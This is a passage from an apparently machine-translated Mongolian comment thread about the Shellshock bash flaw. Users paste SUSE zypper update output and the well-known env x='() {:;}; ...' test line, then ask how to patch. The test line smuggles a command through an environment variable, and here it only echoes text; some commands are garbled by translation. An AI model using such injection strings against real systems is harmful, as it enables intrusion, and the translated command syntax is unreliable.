    -bash: zypper: тушаал олдсонгүй
    BIAL: ~ #

    Бусдад нь:

    SMB: ~ # зиппер дээшлүүлэв
    Системийн эх сурвалжийг сэргээж байна ...
    SUSE Linux Enterprise Server 10 SP2-20100319-161944 мета өгөгдлийг задалж байна ...
    RPM мэдээллийн санг задалж байна ...
    Дүгнэлт:
    Хийх зүйлгүй.

    Би юу хийдэг вэ?
    Зарим нь эмзэг байдал нь буддаг зүйлээс бага гэж хэлдэг гэдгийг би мэднэ, гэхдээ надад байдаг, бага ч бай, том ч бай эрсдэлд орохыг хүсдэггүй.

    Сайн байцгаана уу.

  22.   Sanders gutierrez гэж хэлэв

    Оройн мэнд, би таны нийтлэлд оруулсан кодыг нааж үзлээ, би үүнийг олж авлаа
    sanders @ pc-sanders: ~ $ env x = '() {:;}; echo эмзэг 'bash -c "echo энэ бол тест"
    энэ бол тест
    sanders @ pc-sanders: ~ $
    Би хуваарилалтыг хэрхэн нөхөх талаар тайлбарлаж өгнө үү, би өдөр бүр шинэчлэгддэг бөгөөд хүлээх мөрний гаралтад өөрчлөлт орохгүй байна.

    Маш их баярлалаа!